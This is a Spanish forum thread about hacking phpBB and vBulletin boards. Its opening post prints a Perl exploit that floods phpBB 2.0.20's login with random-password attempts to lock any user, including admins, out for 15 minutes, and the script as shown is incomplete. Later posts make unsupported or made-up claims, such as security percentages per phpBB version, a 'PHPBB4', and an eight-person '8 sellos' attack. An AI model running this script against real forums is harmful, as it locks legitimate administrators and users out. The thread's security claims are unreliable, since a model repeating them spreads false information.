La posibilidad de que hackeen cualquier foro (phpbb y vbulle

Hardware, software, nuevas tecnologías y todo lo que entre en el mundo de la computación y la red de redes...
Avatar de Usuario
[~ShiroSwan~]
De turno con Acerón
De turno con Acerón
Mensajes: 5152
Registrado: Sab Abr 08, 2006 6:14 pm

La posibilidad de que hackeen cualquier foro (phpbb y vbulle

Mensajepor [~ShiroSwan~] »

1ero: un programa especial que lo haga todo , no hay xD

Bueno les informo que ya hay metodos de hackear foros de sistemas bases como:
(phpbb (en todas sus versiones) Vbulletin (en todas sus versiones)

pues como , psssss en todo foro es vulnerable a "ataques infomaticos"

esto se hace mediante "exploit" que se han generado gracias alos errores o bugs "de cualquier sistema de foros"

ejemplo de este (sistema de phpbb2)

Permite desactivar a cualquier usuario durante 15 minutos (incluido admins y mods)

Código: Seleccionar todo

###################################################################################
#!/usr/bin/perl
# For PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

Todo esto , los hackers lo realizan con programa de "programacion" "hosting locales"etc.

Esto ya ha pasado en algunos foros , como en "forospyware" que la intentaron hackear hace 1 año
y psss yo queria saber si funcionaba xD y probe alguno scripts con mi foro de la "wishshop" que he creado y funciono xD.

Para evitar estos ataques es necesario tener instalados algunos "MODS" de seguridad
que se pueden encontrar en las paginas oficiales de estos sistemas de foros.

a continuacion dare informacion de las versiones de phpbb acerca del porcentaje de seguridad

PHPBB (25%)
PHPBB2 (60%)
PHPBB3 (75%)
PHPBB4 (80%)
__________esto es el porcentaje por ahora
aunque en eln futuro el porcentaje de algunos bajara.

por ahora la version mas segura de phppbb que hay es la "4"

Espero que esto les sirva a algunos "admins o dueños de foros" que haiga aqui.
Imagen

Flame Haze
Maestr@ pokémon Johto
Maestr@ pokémon Johto
Mensajes: 665
Registrado: Vie Ene 18, 2008 8:23 pm

Re: La posibilidad de que hackeen cualquier foro (phpbb y vbulle

Mensajepor Flame Haze »

Interesante xD, siempre quise probar alguno de esos exploits en algunos de foros descartables creados en 2 min. para ver que sucedia xDD, pero siempre algo me salia mal xDDDD. Gracias por la info me servira en el futuro
Imagen
My Anime List
"People die, if they are killed."
"Las personas mueren, si son asesinadas." xDDDDDD
by Emiya Shirou
Flame Haze FTW!

Avatar de Usuario
[~ShiroSwan~]
De turno con Acerón
De turno con Acerón
Mensajes: 5152
Registrado: Sab Abr 08, 2006 6:14 pm

Re: La posibilidad de que hackeen cualquier foro (phpbb y vbulle

Mensajepor [~ShiroSwan~] »

vengo a decir aqui que el ataque mas peligroso a un foro seria el de "una inyeccion ala base de datos"
originalmente se llama "SQL inyection"

esto es un vulnerabilidad que tienenen algunos foros phpbb y vbulletin
por lo cual hay pocos MODS para protegerse de este tipo de ataque
por ahora el phpbb3 es vulnerable a este ataque ya que este tiene MODS de seguridad
que no sirven de mucho y pueden ser destruidos por este ataque
ahora mostrare una imagen que ya tengo autorizacion de mis superiores ponerla
aqui:
Imagen
esto es lo que es llamado "8 sellos" lo cual son 8 programas ejecutables
que estan en "serie" lo cual cada uno usa un puerto unico
lo cual este ataque requiere la colaboracion de 8 personas ya que
1 usuario no puede ejecutar los 8 sellos.

la funcion de esto es eliminar a los MODS de seguridad y despues ya poder dañar la base de datos.

La siguiente imagen es una tabla que el atacante puede visualizar usando el programa "cain & abel" en modo de "infeccion"
Imagen
esta table es la lista de vulnerabilidades de un foro que he creado.


Ahora , buscare algunos MODS potentes que puedan detener estos ataques.

editare este post. :arrow:
Imagen